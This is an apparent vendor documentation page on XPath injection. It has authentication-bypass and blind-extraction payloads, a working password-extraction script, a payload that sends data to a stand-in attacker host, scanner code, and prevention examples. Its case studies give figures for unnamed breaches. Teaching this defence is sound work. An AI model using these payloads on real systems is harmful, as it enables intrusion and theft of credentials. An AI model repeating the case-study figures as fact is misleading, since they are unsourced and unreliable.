Documentation

# XPath Injection

XPath Injection Illustration
XPath Injection Illustration

A code injection attack where malicious XPath queries are injected into applications that use XML databases, allowing attackers to bypass authentication or extract sensitive data.

HIGH SEVERITY DATA BREACH XML SECURITY


# What is XPath Injection?

In Simple Terms:

Imagine an XML database as a filing cabinet with folders organized in a specific structure. XPath is like the search command you use to find specific documents.

A normal search might be: "Find the folder for user 'John' with password 'secret123'"

XPath Injection is like manipulating the search to say: "Find the folder for user 'John' OR just show me ALL folders regardless of password"

The filing system follows your manipulated instructions and hands over everything - including documents you shouldn't see.


# Real-World Analogy

Think of XPath like a library's book search system:

XML stores data in a tree structure, like a library organizing books by:

  • Category → Genre → Author → Title
  • Similar to: /library/category/genre/author/book

Librarian searches:

xpath
//book[author='Smith' and title='The Secret']

Returns: One specific book by Smith

Attacker modifies search:

xpath
//book[author='Smith' or '1'='1' and title='anything']
  • The or '1'='1' part is always true
  • Returns: ALL books in the library!

The search system can't distinguish between a legitimate complex search and a manipulated one.


# How XPath Injection Works

# Understanding XPath and XML

XML (eXtensible Markup Language) stores data in a tree structure:

<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user>
    <username>admin</username>
    <password>secretAdminPass123</password>
    <role>administrator</role>
    <email>admin@example.com</email>
  </user>
  <user>
    <username>john</username>
    <password>john'sPassword456</password>
    <role>user</role>
    <email>john@example.com</email>
  </user>
</users>

XPath is a query language for selecting nodes from XML:

xpath
//user[username='admin' and password='secretAdminPass123']

# The Attack Process

Application builds XPath query:

xpath
//user[username='admin' and password='correctPass']

Returns: Admin user if password matches

Attacker enters username: admin' or '1'='1 Application builds query:

xpath
//user[username='admin' or '1'='1' and password='anything']
  • '1'='1' is always true
  • The or operator makes entire condition true
  • Password check is bypassed

XPath returns the admin user without validating password, granting full access.


# Types of XPath Injection Attacks

# 1. Authentication Bypass

CRITICAL

from lxml import etree

def authenticate_user(username, password):
    # Load XML database
    tree = etree.parse('users.xml')

    # VULNERABLE: Direct string concatenation
    xpath_query = f"//user[username='{username}' and password='{password}']"

    # Execute query
    result = tree.xpath(xpath_query)

    if result:
        return True  # User authenticated
    return False

# Attack payload
username = "admin' or '1'='1"
password = "anything"

# Resulting query: //user[username='admin' or '1'='1' and password='anything']
# Returns admin user without password verification!
Username Injections:
' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='

Password Injections:
' or '1'='1
anything' or 'x'='x

Combined:
Username: admin
Password: ' or '1'='1
xpath
Original query:
//user[username='admin' and password='correctPass']

Injected query:
//user[username='admin' or '1'='1' and password='anything']

Result: Returns admin user because '1'='1' is always true

# 2. Data Extraction (Blind XPath Injection)

HIGH RISK

When application doesn't display query results directly, attackers extract data character by character using boolean conditions.

# Testing if admin user exists
payload = "' or count(//user[username='admin'])=1 or ''='"

# Extracting admin password length
payload = "' or string-length(//user[username='admin']/password)=16 or ''='"

# Extracting first character of password
payload = "' or substring(//user[username='admin']/password,1,1)='a' or ''='"
payload = "' or substring(//user[username='admin']/password,1,1)='b' or ''='"
# ... continue for each character

# Extracting second character
payload = "' or substring(//user[username='admin']/password,2,1)='e' or ''='"
import requests
import string

def extract_admin_password(url):
    """Extract admin password character by character"""
    password = ""
    charset = string.ascii_letters + string.digits + string.punctuation

    # First, find password length
    for length in range(1, 50):
        payload = f"' or string-length(//user[username='admin']/password)={length} or ''='"
        response = requests.post(url, data={'username': payload, 'password': 'test'})

        if "success" in response.text or response.status_code == 200:
            print(f"[+] Password length: {length}")
            break

    # Extract each character
    for position in range(1, length + 1):
        for char in charset:
            payload = f"' or substring(//user[username='admin']/password,{position},1)='{char}' or ''='"
            response = requests.post(url, data={'username': payload, 'password': 'test'})

            if "success" in response.text:
                password += char
                print(f"[+] Found character {position}: {char} (password so far: {password})")
                break

    return password

# Usage
admin_password = extract_admin_password('https://vulnerable-site.com/login')
print(f"[!] Admin password: {admin_password}")

# 3. Complete XML Document Extraction

MEDIUM RISK

# Vulnerable search function
def search_products(product_name):
    tree = etree.parse('products.xml')

    # VULNERABLE: No input sanitization
    xpath_query = f"//product[name='{product_name}']"

    results = tree.xpath(xpath_query)
    return results

# Normal search
search_products("Laptop")
# Query: //product[name='Laptop']
# Returns: Laptop products

# Malicious search - Extract all products
search_products("' or '1'='1")
# Query: //product[name='' or '1'='1']
# Returns: ALL products in database!

# Extract specific sensitive data
search_products("'] | //user[username='admin")
# Query: //product[name=''] | //user[username='admin']
# Returns: Admin user data from users section!
Attack payloads using XPath functions:

Count nodes:
' or count(//user)>0 or ''='

Extract node names:
' or name(//user[1])='user' or ''='

Extract all text:
' or //text() or ''='

Access parent nodes:
' or //user/parent::* or ''='

Navigate XML structure:
' or //*/password or ''='

# 4. Out-of-Band Data Exfiltration

ADVANCED TECHNIQUE

# Some XPath implementations support external functions
# Attacker can exfiltrate data via HTTP requests

payload = """' or doc('http://attacker.com/steal?data=' || //user[username='admin']/password) or ''='"""

# This sends admin password to attacker's server

# Real-World Examples

# Case Study 1: Financial Institution Data Breach (2016)

Major bank's internal employee portal used XML database with XPath for authentication.

@app.route('/employee/login', methods=['POST'])
def employee_login():
    username = request.form['username']
    password = request.form['password']

    # VULNERABLE: Direct string concatenation
    xpath_query = f"//employee[username='{username}' and password='{password}']"

    tree = etree.parse('/data/employees.xml')
    result = tree.xpath(xpath_query)

    if result:
        session['user'] = result[0].find('username').text
        session['role'] = result[0].find('role').text
        return redirect('/dashboard')

    return "Login failed"

External attacker discovered vulnerability through error messages:

Username: admin' or '1'='1
Password: [empty]

Then used blind XPath injection to extract:

  • All employee credentials
  • Salary information
  • Social security numbers
  • Bank account details
  • Customer account numbers
  • 15,000+ employee records compromised
  • 2.5 million customer accounts at risk
  • $45 million in direct costs (remediation, notification, credit monitoring)
  • $120 million regulatory fines
  • $85 million class action settlement
  • Stock price dropped 22%
  • CEO and CIO resigned

# Case Study 2: Healthcare Portal XML Injection (2018)

250,000 Patients Affected

Technical Details:

<!-- Their XML structure -->
<patients>
  <patient>
    <id>P12345</id>
    <name>John Doe</name>
    <ssn>123-45-6789</ssn>
    <diagnosis>Diabetes Type 2</diagnosis>
    <medications>
      <medication>Metformin 500mg</medication>
      <medication>Insulin Glargine</medication>
    </medications>
    <insurance>
      <provider>BlueCross</provider>
      <policy>BC-12345678</policy>
    </insurance>
  </patient>
</patients>
# Their vulnerable patient lookup
def get_patient_records(patient_id, dob):
    # VULNERABLE: No input validation
    xpath = f"//patient[id='{patient_id}' and dateOfBirth='{dob}']"

    tree = etree.parse('/secure/patients.xml')
    results = tree.xpath(xpath)

    return render_template('patient_record.html', patient=results)

Attack Payload:

Patient ID: ' or '1'='1
Date of Birth: [any]

What Was Exposed:

  • 250,000 patient health records
  • Diagnoses and treatment histories
  • Prescriptions and medications
  • Social security numbers
  • Insurance information
  • Lab results and medical images

Consequences:

  • $16 million HIPAA violation fine
  • $42 million class action lawsuit
  • Criminal investigation by DOJ
  • Hospital system lost major contracts
  • 3-year compliance monitoring imposed

# Case Study 3: E-commerce Product Database Breach (2019)

Online retailer storing product catalog and customer reviews in XML

// Node.js vulnerable product search
const xpath = require('xpath');
const dom = require('xmldom').DOMParser;
const fs = require('fs');

app.get('/products/search', (req, res) => {
  const searchTerm = req.query.q;

  // VULNERABLE: Direct string interpolation
  const xpathQuery = `//product[contains(name, '${searchTerm}') or contains(description, '${searchTerm}')]`;

  const xml = fs.readFileSync('products.xml', 'utf8');
  const doc = new dom().parseFromString(xml);

  const results = xpath.select(xpathQuery, doc);

  res.json(results);
});

Attacker used search functionality to inject:

Search: ') or '1'='1'] | //customer[contains(email, '@

This extracted:

  • Internal product costs and margins
  • Supplier pricing
  • Customer email addresses
  • Order histories
  • Payment information
  • 800,000 customer emails harvested
  • Used for phishing campaign
  • Competitive pricing information leaked
  • $3.5 million in losses
  • $8 million GDPR fines

# How to Detect XPath Injection

# Manual Testing

Find inputs that might query XML:

  • Login forms
  • Search boxes
  • Filter parameters
  • ID lookups
  • API endpoints

Try XPath special characters:

' " / [ ] ( ) @ * |

Watch for:

  • XML parsing errors
  • XPath syntax errors
  • Changes in response
  • Different behavior
' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='
'] | //user[@* or '1'='1
' or count(//user)>0 or ''='
' or string-length(//user[1]/password)>0 or ''='
' or substring(//user[1]/password,1,1)='a' or ''='

# Automated Testing Script

import requests
from urllib.parse import quote

def test_xpath_injection(target_url, param_name):
    """Test for XPath injection vulnerabilities"""

    test_payloads = [
        # Authentication bypass
        "' or '1'='1",
        "' or 1=1 or ''='",
        "admin' or '1'='1' or ''='",
        "' or ''='",
        "x' or 1=1 or 'x'='y",

        # Boolean tests
        "' or count(//user)>0 or ''='",
        "' or string-length(//user[1]/password)>0 or ''='",

        # Node extraction
        "'] | //user | //x[@'='",
        "'] | //* | //x[@'='",

        # Function tests
        "' or name()='user' or ''='",
        "' or local-name()='password' or ''='",

        # Parent node access
        "'] | //user/parent::* | //x[@'='"
    ]

    vulnerabilities = []
    baseline_response = None

    try:
        # Get baseline response
        baseline_response = requests.get(target_url, params={param_name: 'normaltest'})
    except Exception as e:
        print(f"[-] Error getting baseline: {e}")
        return []

    print(f"[*] Testing {target_url} parameter '{param_name}'...")

    for payload in test_payloads:
        try:
            response = requests.get(
                target_url,
                params={param_name: payload},
                timeout=5
            )

            # Check for vulnerability indicators
            if response.status_code != baseline_response.status_code:
                vulnerabilities.append({
                    'payload': payload,
                    'type': 'Status Code Change',
                    'severity': 'MEDIUM',
                    'status': response.status_code
                })
                print(f"[!] Status change with: {payload}")

            # Check for XPath errors
            xpath_errors = [
                'xpath',
                'XPathException',
                'xmlXPathEval',
                'XPath error',
                'XPath syntax error',
                'Invalid predicate',
                'Invalid expression'
            ]

            for error in xpath_errors:
                if error.lower() in response.text.lower():
                    vulnerabilities.append({
                        'payload': payload,
                        'type': 'XPath Error Message',
                        'severity': 'HIGH',
                        'error': error
                    })
                    print(f"[!] XPath error revealed with: {payload}")
                    break

            # Check for successful bypass (content changes)
            if len(response.text) > len(baseline_response.text) * 1.5:
                vulnerabilities.append({
                    'payload': payload,
                    'type': 'Possible Authentication Bypass',
                    'severity': 'CRITICAL',
                    'note': 'Significantly more content returned'
                })
                print(f"[!] CRITICAL: Possible bypass with: {payload}")

        except requests.exceptions.Timeout:
            print(f"[-] Timeout with payload: {payload}")
        except Exception as e:
            print(f"[-] Error testing '{payload}': {e}")

    return vulnerabilities

# Test your application
vulns = test_xpath_injection(
    'https://example.com/search',
    'q'  # Query parameter name
)

if vulns:
    print(f"\n[!] Found {len(vulns)} potential XPath injection vulnerabilities!")
    for vuln in vulns:
        print(f"  [{vuln['severity']}] {vuln['type']}: {vuln['payload']}")
else:
    print("[+] No XPath injection vulnerabilities detected")
# Burp Intruder payload list for XPath injection
payloads = """
' or '1'='1
' or 1=1 or ''='
admin' or '1'='1' or ''='
' or ''='
x' or 1=1 or 'x'='y
'] | //user[@* or '1'='1'] | //x[@'='
'] | //* | //x[@'='
' or count(//user)>0 or ''='
' or string-length(//user[1]/password)>0 or ''='
' or substring(//user[1]/password,1,1)='a' or ''='
' or name()='user' or ''='
"""

# Configure Burp:
# 1. Set payload positions at vulnerable parameters
# 2. Load payloads from above list
# 3. Grep Match:
#    - xpath
#    - XPathException
#    - xmlXPathEval
#    - Invalid predicate
# 4. Check for status code changes
# 5. Compare response lengths

# Prevention Strategies

# 1. Parameterized XPath Queries

MOST SECURE

from lxml import etree

def safe_authenticate(username, password):
    """Secure XPath authentication using parameterized queries"""

    tree = etree.parse('users.xml')

    # Method 1: Use XPath variables (lxml supports this)
    # SECURE: Parameters are passed separately
    xpath_query = "//user[username=$username and password=$password]"

    result = tree.xpath(
        xpath_query,
        username=username,
        password=password
    )

    if result:
        return {
            'authenticated': True,
            'username': result[0].find('username').text,
            'role': result[0].find('role').text
        }

    return {'authenticated': False}

# Attack payloads will NOT work
username = "admin' or '1'='1"
password = "anything"

# XPath treats these as literal strings, not code:
# username = "admin' or '1'='1" (the WHOLE string including quotes)
# password = "anything"
# No injection possible!
const xpath = require('xpath');
const dom = require('xmldom').DOMParser;
const fs = require('fs');

function safeAuthenticate(username, password) {
  const xml = fs.readFileSync('users.xml', 'utf8');
  const doc = new dom().parseFromString(xml);

  // Method: Manually iterate and compare (most secure)
  // SECURE: No XPath injection possible

  const users = xpath.select('//user', doc);

  for (let user of users) {
    const userUsername = xpath.select('string(username)', user);
    const userPassword = xpath.select('string(password)', user);

    // Direct string comparison (no injection)
    if (userUsername === username && userPassword === password) {
      return {
        authenticated: true,
        username: userUsername,
        role: xpath.select('string(role)', user)
      };
    }
  }

  return { authenticated: false };
}

// Attack payloads will not work
const result = safeAuthenticate("admin' or '1'='1", "anything");
// This looks for EXACT match of username "admin' or '1'='1"
// No code execution - just string comparison
import javax.xml.parsers.*;
import javax.xml.xpath.*;
import org.w3c.dom.*;
import java.io.File;

public class SecureXPathAuth {

    public static boolean authenticateUser(String username, String password) {
        try {
            // Parse XML
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            DocumentBuilder builder = factory.newDocumentBuilder();
            Document doc = builder.parse(new File("users.xml"));

            // SECURE: Use XPath with variables
            XPathFactory xPathFactory = XPathFactory.newInstance();
            XPath xPath = xPathFactory.newXPath();

            // Set variables (parameterized)
            SimpleVariableResolver resolver = new SimpleVariableResolver();
            resolver.addVariable("username", username);
            resolver.addVariable("password", password);
            xPath.setXPathVariableResolver(resolver);

            // Parameterized query
            String xpathExpression = "//user[username=$username and password=$password]";

            XPathExpression expr = xPath.compile(xpathExpression);
            NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);

            return nodes.getLength() > 0;

        } catch (Exception e) {
            System.err.println("Authentication error: " + e.getMessage());
            return false;
        }
    }

    // Variable resolver for XPath parameters
    static class SimpleVariableResolver implements XPathVariableResolver {
        private Map<String, Object> variables = new HashMap<>();

        public void addVariable(String name, Object value) {
            variables.put(name, value);
        }

        @Override
        public Object resolveVariable(QName variableName) {
            return variables.get(variableName.getLocalPart());
        }
    }
}

# 2. Input Validation and Sanitization

DEFENSE IN DEPTH

import re
from html import escape

def sanitize_xpath_input(user_input):
    """Sanitize input for XPath queries"""

    # Method 1: Strict allowlist validation
    if not re.match(r'^[a-zA-Z0-9@._-]{3,50}$', user_input):
        raise ValueError("Invalid input format")

    return user_input

def escape_xpath_value(value):
    """Escape special XPath characters"""

    # XPath doesn't have standard escaping, so we need to be creative

    # If value contains both ' and ", we're in trouble with XPath 1.0
    # Best approach: Use concat function

    if "'" not in value:
        # Simple case: wrap in single quotes
        return f"'{value}'"
    elif '"' not in value:
        # No double quotes: wrap in double quotes
        return f'"{value}"'
    else:
        # Contains both: use concat function
        parts = value.split("'")
        quoted_parts = [f'"{part}"' if part else "''" for part in parts]
        return f"concat({', '.join(quoted_parts)})"

def safe_search_products(product_name):
    """Secure product search with escaping"""

    # Validate input
    if not product_name or len(product_name) > 100:
        return []

    tree = etree.parse('products.xml')

    # Escape the value
    escaped_name = escape_xpath_value(product_name)

    # Build query with escaped value
    xpath_query = f"//product[name={escaped_name}]"

    results = tree.xpath(xpath_query)
    return results

# Example usage
# Input: O'Reilly Books
# Escaped: concat("O", "'", "Reilly Books")
# Query: //product[name=concat("O", "'", "Reilly Books")]
import re
from typing import Any, Optional

class XPathInputValidator:
    """Comprehensive XPath input validation"""

    # Validation patterns
    USERNAME_PATTERN = r'^[a-zA-Z0-9._-]{3,20}$'
    EMAIL_PATTERN = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
    ALPHANUMERIC_PATTERN = r'^[a-zA-Z0-9\s]{1,100}$'

    # Dangerous XPath keywords
    XPATH_KEYWORDS = [
        'or', 'and', 'not', 'div', 'mod', 'union', '|',
        'parent::', 'ancestor::', 'following::', 'preceding::',
        'document', 'doc', 'collection'
    ]

    @staticmethod
    def validate_username(username: str) -> bool:
        """Validate username format"""
        return bool(re.match(XPathInputValidator.USERNAME_PATTERN, username))

    @staticmethod
    def validate_email(email: str) -> bool:
        """Validate email format"""
        return bool(re.match(XPathInputValidator.EMAIL_PATTERN, email))

    @staticmethod
    def check_dangerous_keywords(value: str) -> bool:
        """Check for dangerous XPath keywords"""
        value_lower = value.lower()

        for keyword in XPathInputValidator.XPATH_KEYWORDS:
            if keyword in value_lower:
                return False

        return True

    @staticmethod
    def sanitize_and_validate(value: str, input_type: str = 'alphanumeric') -> Optional[str]:
        """Sanitize and validate input"""

        # Check length
        if not value or len(value) > 100:
            raise ValueError("Input length invalid")

        # Remove dangerous characters
        dangerous_chars = ["'", '"', '/', '[', ']', '(', ')', '@', '*', '|', '\\']

        for char in dangerous_chars:
            if char in value:
                raise ValueError(f"Dangerous character detected: {char}")

        # Check for XPath keywords
        if not XPathInputValidator.check_dangerous_keywords(value):
            raise ValueError("Dangerous XPath keyword detected")

        # Type-specific validation
        if input_type == 'username':
            if not XPathInputValidator.validate_username(value):
                raise ValueError("Invalid username format")
        elif input_type == 'email':
            if not XPathInputValidator.validate_email(value):
                raise ValueError("Invalid email format")
        elif input_type == 'alphanumeric':
            if not re.match(XPathInputValidator.ALPHANUMERIC_PATTERN, value):
                raise ValueError("Invalid alphanumeric input")

        return value

# Usage
try:
    username = XPathInputValidator.sanitize_and_validate("admin' or '1'='1", 'username')
    # Raises: ValueError: Dangerous character detected: '
except ValueError as e:
    print(f"Invalid input: {e}")

# 3. Migrate from XML to Secure Database

LONG-TERM SOLUTION

# Instead of XML/XPath, use proper database with parameterized queries

import sqlite3
from werkzeug.security import check_password_hash

def authenticate_with_database(username, password):
    """Secure authentication using SQLite with parameterized queries"""

    conn = sqlite3.connect('users.db')
    cursor = conn.cursor()

    # SECURE: Parameterized query (no injection possible)
    cursor.execute(
        "SELECT username, password_hash, role FROM users WHERE username = ?",
        (username,)
    )

    result = cursor.fetchone()
    conn.close()

    if result and check_password_hash(result[1], password):
        return {
            'authenticated': True,
            'username': result[0],
            'role': result[2]
        }

    return {'authenticated': False}

# Injection payloads have NO effect
username = "admin' or '1'='1"
# Treated as literal string "admin' or '1'='1"
# No code execution possible!

# 4. Comprehensive Security Implementation

[xpath_security.py]
from lxml import etree
from typing import Optional, Dict, Any
import logging
import hashlib

class SecureXPathService:
    """Enterprise-grade secure XPath service"""

    def __init__(self, xml_file: str):
        self.xml_file = xml_file
        self.tree = None
        self.logger = logging.getLogger(__name__)
        self.load_xml()

    def load_xml(self):
        """Load and validate XML file"""
        try:
            # Parse with security settings
            parser = etree.XMLParser(
                remove_blank_text=True,
                resolve_entities=False,  # Prevent XXE
                no_network=True,         # No external resources
                dtd_validation=False,    # No DTD validation
                load_dtd=False           # Don't load DTD
            )

            self.tree = etree.parse(self.xml_file, parser)

        except Exception as e:
            self.logger.error(f"Failed to load XML: {e}")
            raise

    def authenticate(self, username: str, password: str) -> Dict[str, Any]:
        """Secure authentication - iterate manually"""

        # Input validation
        if not self._validate_username(username):
            self.logger.warning(f"Invalid username format: {username}")
            return {'authenticated': False}

        # Iterate through users manually (no XPath injection possible)
        users = self.tree.xpath('//user')

        for user in users:
            stored_username = user.find('username').text
            stored_password_hash = user.find('password_hash').text

            if stored_username == username:
                # Check password hash
                password_hash = self._hash_password(password)

                if password_hash == stored_password_hash:
                    self.logger.info(f"Successful authentication: {username}")
                    return {
                        'authenticated': True,
                        'username': stored_username,
                        'role': user.find('role').text
                    }

        self.logger.warning(f"Failed authentication: {username}")
        return {'authenticated': False}

    def _validate_username(self, username: str) -> bool:
        """Strict username validation"""
        import re
        return bool(re.match(r'^[a-zA-Z0-9._-]{3,20}$', username))

    def _hash_password(self, password: str) -> str:
        """Hash password"""
        return hashlib.sha256(password.encode()).hexdigest()

    def search_safe(self, field: str, value: str) -> list:
        """Safe search without user-controlled XPath"""

        # Whitelist allowed fields
        allowed_fields = ['username', 'email', 'role']

        if field not in allowed_fields:
            raise ValueError(f"Invalid field: {field}")

        # Validate input
        if not value or len(value) > 100:
            raise ValueError("Invalid search value")

        # Manual iteration (no XPath with user input)
        results = []
        users = self.tree.xpath('//user')

        for user in users:
            field_value = user.find(field)

            if field_value is not None and value.lower() in field_value.text.lower():
                results.append({
                    'username': user.find('username').text,
                    'email': user.find('email').text,
                    'role': user.find('role').text
                })

        return results
[users.xml]
<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user>
    <username>admin</username>
    <!-- Store password hashes, not plaintext -->
    <password_hash>5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8</password_hash>
    <role>administrator</role>
    <email>admin@example.com</email>
  </user>
  <user>
    <username>john</username>
    <password_hash>6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b</password_hash>
    <role>user</role>
    <email>john@example.com</email>
  </user>
</users>

# Security Checklist

# Development

  • Never concatenate user input into XPath queries
  • Use parameterized XPath queries when available
  • Validate all inputs with strict allowlists
  • Remove or escape XPath special characters: ' " / [ ] ( ) @ * |
  • Check for dangerous XPath keywords (or, and, union, |)
  • Store password hashes, never plaintext
  • Consider migrating from XML to proper database
  • Implement comprehensive input validation

# Testing

  • Test with XPath injection payloads
  • Verify authentication bypass attempts fail
  • Test boolean-based blind injection
  • Check for XPath error messages in responses
  • Test with special characters
  • Verify node extraction attempts fail
  • Test with XPath functions (count, substring, etc.)
  • Use automated scanners (Burp Suite, OWASP ZAP)

# Production

  • Disable XML entity expansion (prevent XXE)
  • Implement comprehensive logging
  • Monitor for suspicious query patterns
  • Set up alerts for authentication anomalies
  • Regular security audits
  • Keep XML libraries updated
  • Implement rate limiting
  • Use Web Application Firewall (WAF)

# Key Takeaways


# How Layerd AI Protects Against XPath Injection

Layerd AI provides comprehensive XPath injection protection:

  • Automatic Input Sanitization: Detects and escapes XPath special characters in all inputs
  • Query Pattern Analysis: Identifies malicious XPath syntax and boolean conditions
  • Authentication Monitoring: Alerts on suspicious login attempts and bypass patterns
  • XML Security Scanning: Analyzes XML data storage for security best practices
  • Real-time Blocking: Prevents XPath injection attempts before they reach your XML database
  • Code Analysis: Scans application code for vulnerable XPath query construction

Secure your XML data with Layerd AI's intelligent XPath injection protection.


# Additional Resources


Last Updated: November 2025